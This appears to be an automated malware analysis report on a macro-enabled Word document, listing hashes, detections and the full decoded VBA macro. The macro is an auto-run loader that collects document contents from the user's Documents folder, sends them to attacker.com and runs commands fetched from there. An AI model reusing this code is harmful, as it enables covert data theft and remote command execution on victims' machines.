Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 61093d488149a7ce…

MALICIOUS

Office (OOXML) / .DOCX

19.9 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-05-27
MD5: 7aea2d46b19ddbc5bfe83ff672f24c5b SHA-1: 8c75c32ad997ac9fb238add548295c93cf124bbc SHA-256: 61093d488149a7ce9d2a08ec0cceab0f3651516d847560c56abc4091f79222b8
298 Risk Score

Heuristics 8

  • ClamAV: Win.Worm.IFeel-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Worm.IFeel-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set WshShell = CreateObject(Chr(87) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WshShell = CreateObject(Chr(87) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Set Folder = FSO.GetFolder(Chr(67) & Chr(58) & Chr(92) & Chr(85) & Chr(115) & Chr(101) & Chr(114) & Chr(115) & Chr(92) & Environ(Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(78) & Chr(65) & Chr(77) & Chr(69)) & Chr(92) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/2019/extlstIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5814 bytes
SHA-256: 12a78373f44abb7a5c4e82eefd8767e125fd8cab24b7767828e07fa7e8199c77
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim WshShell As Object
    Dim FSO As Object
    Dim Folder As Object
    Dim File As Object
    Dim WordApp As Object
    Dim Doc As Object
    Dim byteConverter As Object
    Dim byteData As Variant
    Dim base64Data As String
    Dim xmlHttp As Object
    Dim Commands As String
    Dim dataToSend As String
    Dim AcroApp As Object
    Dim AcroAVDoc As Object
    Dim AcroPDDoc As Object
    
    ' Stage 2: Execution
    Set WshShell = CreateObject(Chr(87) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
    WshShell.Exec Chr(99) & Chr(109) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(73) & Chr(110) & Chr(105) & Chr(116) & Chr(105) & Chr(97) & Chr(108) & Chr(32) & Chr(99) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & Chr(32) & Chr(101) & Chr(120) & Chr(101) & Chr(99) & Chr(117) & Chr(116) & Chr(101) & Chr(100)
    
    ' Stage 3: Discovery
    Set FSO = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
    Set Folder = FSO.GetFolder(Chr(67) & Chr(58) & Chr(92) & Chr(85) & Chr(115) & Chr(101) & Chr(114) & Chr(115) & Chr(92) & Environ(Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(78) & Chr(65) & Chr(77) & Chr(69)) & Chr(92) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
    
    dataToSend = ""
    
    For Each File In Folder.Files
        If LCase(FSO.GetExtensionName(File.Name)) = Chr(100) & Chr(111) & Chr(99) & Chr(120) Or LCase(FSO.GetExtensionName(File.Name)) = Chr(112) & Chr(100) & Chr(102) Then
            dataToSend = dataToSend & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(58) & Chr(32) & File.Name & vbCrLf
            
            ' Stage 4: Credential Access
            If LCase(FSO.GetExtensionName(File.Name)) = Chr(100) & Chr(111) & Chr(99) & Chr(120) Then
                Set WordApp = CreateObject(Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
                Set Doc = WordApp.Documents.Open(File.Path)
                dataToSend = dataToSend & Chr(67) & Chr(111) & Chr(110) & Chr(116) & Chr(101) & Chr(110) & Chr(116) & Chr(58) & Chr(32) & Doc.Content.Text & vbCrLf
                Doc.Close False
                WordApp.Quit
            ElseIf LCase(FSO.GetExtensionName(File.Name)) = Chr(112) & Chr(100) & Chr(102) Then
                ' Assuming Acrobat Reader is installed
                Set AcroApp = CreateObject(Chr(65) & Chr(99) & Chr(114) & Chr(111) & Chr(69) & Chr(120) & Chr(99) & Chr(46) & Chr(65) & Chr(112) & Chr(112))
                Set AcroAVDoc = CreateObject(Chr(65) & Chr(99) & Chr(114) & Chr(111) & Chr(69) & Chr(120) & Chr(99) & Chr(46) & Chr(65) & Chr(86) & Chr(68) & Chr(111) & Chr(99))
                If AcroAVDoc.Open(File.Path, "") Then
                    Set AcroPDDoc = AcroAVDoc.GetPDDoc
                    dataToSend = dataToSend & Chr(67) & Chr(111) & Chr(110) & Chr(116) & Chr(101) & Chr(110) & Chr(116) & Chr(58) & Chr(32) & AcroPDDoc.GetInfo(Chr(84) & Chr(105) & Chr(116) & Chr(108) & Chr(101)) & vbCrLf
                    AcroAVDoc.Close True
                End If
                AcroApp.Exit
            End If
        End If
    Next File
    
    ' Stage 5: Data Exfiltration
    Set byteConverter = CreateObject(Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(46) & Chr(84) & Chr(101) & Chr(120) & Chr(116) & Chr(46) & Chr(85) & Chr(84) & Chr(70) & Chr(56) & Chr(69) & Chr(110) & Chr(99) & Chr(111) & Chr(100) & Chr(105) & Chr(110) & Chr(103))
    byteData = byteConverter.GetBytes(dataToSend)
    base64Data = CreateObject(Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(46) & Chr(67) & Chr(111) & Chr(110) & Chr(118) & Chr(101) & Chr(114) & Chr(116)).ConvertToBase64String(byteData)
    
    Set xmlHttp = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(116) & Chr(116) & Chr(112))
    xmlHttp.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(97) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(107) & Chr(101) & Chr(114) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(63) & Chr(100) & Chr(97) & Chr(116) & Chr(97) & Chr(61) & base64Data
    xmlHttp.send
    
    ' Stage 6: Command and Control
    xmlHttp.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(97) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(107) & Chr(101) & Chr(114) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(99) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100)
    xmlHttp.send
    Commands = xmlHttp.responseText
    
    ' Execute received commands
    If Commands <> "" Then
        WshShell.Exec Chr(99) & Chr(109) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Commands
    End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 89d483a6d5961b98b976e35b17d9a41c4604648d85136952b9d2758b39f93864
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely